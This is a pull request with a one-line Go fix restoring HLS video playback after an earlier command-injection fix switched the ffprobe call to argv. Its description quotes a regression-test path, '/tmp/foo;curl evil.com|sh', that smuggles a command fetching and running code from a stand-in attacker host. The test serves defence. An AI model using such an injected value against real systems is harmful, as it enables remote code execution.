### PR TITLE
fix(media): unbreak HLS playback after argv switch in ffprobe invocation

### DIFF
--- a/pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go
+++ b/pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go
@@ -552,8 +552,13 @@ func (m *MediaEncoder) GetMediaInfo(request *mediaencoding.MediaInfoRequest, ctx
 	extractChapters := request.MediaType == dlna.Video && request.ExtractChapters
 	extraArgs := m.GetExtraArguments(request)
 
+	// ffprobe is now invoked via argv (see GetMediaInfoInternal); the
+	// shell-style wrapping that GetInputArgument adds (e.g.
+	// `file:"<path>"` or `"<url>"`) would otherwise be passed verbatim
+	// to ffprobe and break the open. ffprobe accepts a bare local path
+	// or URL as -i directly, so feed it the raw MediaSource.Path.
 	return m.GetMediaInfoInternal(
-		m.GetInputArgument(request.MediaSource.Path, *request.MediaSource),
+		request.MediaSource.Path,
 		request.MediaSource.Path,
 		request.MediaSource.Protocol,
 		extractChapters,


### PR DESCRIPTION
## Summary

PR #324 (`security/media-ffprobe-argv`) closed a PlayPath command-injection by
switching `MediaEncoder.GetMediaInfoInternal` from `sh -c \"ffprobe ...\"` to a
direct argv invocation. The argv change itself is correct, but the value fed
to it (`inputPath`) is still produced by `GetInputArgument`, which wraps the
path for the **shell** stage that no longer exists:

- File protocol: `file:\"<path>\"` (with literal `\"` characters)
- HTTP/remote: `\"<url>\"` (with literal `\"` characters)

Under `sh -c` the shell stripped those quotes before exec'ing ffprobe. Under
argv, the whole string — quotes and all — is delivered to ffprobe as a single
filename. ffprobe fails to open it, the error propagates up
`GetMediaInfo → GetStreamingState → GetVariantPlaylistInternal`, and
`GetVariantHlsVideoPlaylist` converts it into a generic 400:

```json
{"code":1,"message":"GetPlaylist invalid PlayPath"}
```

Net effect: **every video playback request to `/videos/{node}/main.m3u8` is
broken** for every storage backend (drive / sync / google / dropbox / s3 / share).

## Fix

Pass `request.MediaSource.Path` (the raw local path or URL) straight into
`GetMediaInfoInternal`. ffprobe accepts a bare local path or URL as `-i` in
argv mode — no `file:` prefix, no quoting, no shell escaping required.

The shell-friendly helper `GetInputArgument` is intentionally **left in place**
because the ffmpeg transcode command line (`GetInputPathArgument` /
`GetInputPathArgument2`) is still assembled as a string and consumes it. Only
the ffprobe call had moved to argv; this PR aligns its caller with that move.

```diff
+	// ffprobe is now invoked via argv (see GetMediaInfoInternal); the
+	// shell-style wrapping that GetInputArgument adds (e.g.
+	// `file:\"<path>\"` or `\"<url>\"`) would otherwise be passed verbatim
+	// to ffprobe and break the open. ffprobe accepts a bare local path
+	// or URL as -i directly, so feed it the raw MediaSource.Path.
 	return m.GetMediaInfoInternal(
-		m.GetInputArgument(request.MediaSource.Path, *request.MediaSource),
+		request.MediaSource.Path,
 		request.MediaSource.Path,
```

One real-code line changed. **No line from #324 is reverted**: the argv
invocation, the `buildFFProbeArgs` helper, the `ffprobePath == nil` guard,
and the regression-test file are all untouched. The metacharacter regression
matrix `TestBuildFFProbeArgs_ShellMetacharactersInPathArePreserved` still
passes because the argv path itself was never modified.

## Why the #324 unit tests didn't catch this

The tests added in `ffprobe_args_test.go` exercise `buildFFProbeArgs` directly
with bare paths (`/data/video.mp4`, `/tmp/foo;curl evil.com|sh`, …). They
never go through `GetMediaInfo`, which is where `GetInputArgument` adds the
shell wrapper. So the pure-helper tests stayed green while the real call
chain was broken at runtime.

A follow-up to add an end-to-end test against `GetMediaInfo` (asserting the
final argv contains `-i /data/...mp4` rather than `-i file:\"/data/...mp4\"`)
would be a good safety net; happy to do it in a separate PR if reviewers prefer.

## Scope

- One file: `pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go`
- Affects: ffprobe invocation in `GetMediaInfo` only.
- Not touched: ffmpeg transcode pipeline, segment generation, any other code
  path that calls `GetInputArgument` / `GetInputPathArgument2`.

## Test plan

- [x] `go build ./pkg/media/...` — clean.
- [x] `go test ./pkg/media/mediabrowser/mediaencoding/encoder/ -run TestBuildFFProbeArgs` — pass.
- [x] Manual: replay the failing HLS playlist URL against a drive-backed
      `.mp4`; previously returned `{\"code\":1,\"message\":\"GetPlaylist invalid PlayPath\"}`,
      now returns the variant playlist.
- [ ] Reviewer to spot-check a sync-backed playback and a share-backed
      playback if convenient (same code path, different `MediaSource.Path`
      shape; both were affected and both should now work).

## Related

- Regression introduced by #324 (`security/media-ffprobe-argv`).
- Does not revert or weaken #324 — the `sh -c` removal stays, and the
  ffprobe argv path is untouched.

Made with [Cursor](https://cursor.com)